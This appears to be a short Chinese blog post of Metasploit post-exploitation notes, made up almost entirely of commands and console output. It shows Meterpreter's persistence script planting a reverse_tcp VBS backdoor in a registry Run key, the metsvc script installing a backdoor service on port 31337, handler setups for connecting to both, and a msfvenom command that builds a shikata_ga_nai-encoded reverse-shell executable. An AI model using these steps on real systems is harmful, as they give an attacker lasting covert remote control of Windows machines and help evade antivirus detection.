生成shellcode:
持久控制:
1.meterpreter自带脚本
方法1.run presistence
可以使用run presistence -h查看选项:
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.139 [*] Running Persistance Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN03SP0_20130122.2044/WIN03SP0_20130122.2044.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.139 LPORT=443 [*] Persistent agent script is 609496 bytes long [+] Persistent Script written to C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs [*] Executing script C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs [+] Agent executed with PID 3272 [*] Installing into autorun as HKCU\Software\Microsoft\Windows
\CurrentVersion\Run\FCBCUBtLrzFY [+] Installed into autorun as HKCU\Software\Microsoft\Windows
\CurrentVersion\Run\FCBCUBtLrzFY可以看到添加启动是通过,添加注册表键值,启动的是vbs脚本的后门。
连接:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf exploit(handler) > set LHOST 192.168.1.139 LHOST => 192.168.1.139 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > exploit [*] Started bind handler [*] Starting the payload handler...默认没启动,目标机重启后,可以成功获得meterpreter shell
方法2.run metsvc
执行metsvc 脚本
meterpreter > run metsvc -A [*] Creating a meterpreter service on port 31337 [*] Creating a temporary installation directory C:\WINDOWS\TEMP
\kqaqtcsWhBTbO... [*] >> Uploading metsrv.dll... [*] >> Uploading metsvc-server.exe... [*] >> Uploading metsvc.exe... [*] Starting the service... * Installing service metsvc * Starting service Service metsvc successfully installed. [*] Trying to connect to the Meterpreter service at 192.168.1.108:31337...新建的服务,加自启动(映像名称metsvc.exe,服务metsvc ),连接到后门:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337 LPORT => 31337 msf exploit(handler) > set RHOST 192.168.1.108 RHOST => 192.168.1.108 msf exploit(handler) > exploit [*] Started bind handler [*] Starting the payload handler... meterpreter >成功连接
原生:
msfvenom -p windows/meterpreter/reverse_tcp --arch x86 --platform Windows -e x86/shikata_ga_nai -b '\x00' -i 5 LHOST=192.168.1.101 LPORT=4444 -f exe > abc.exe
寄生:
扫一扫
6846
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
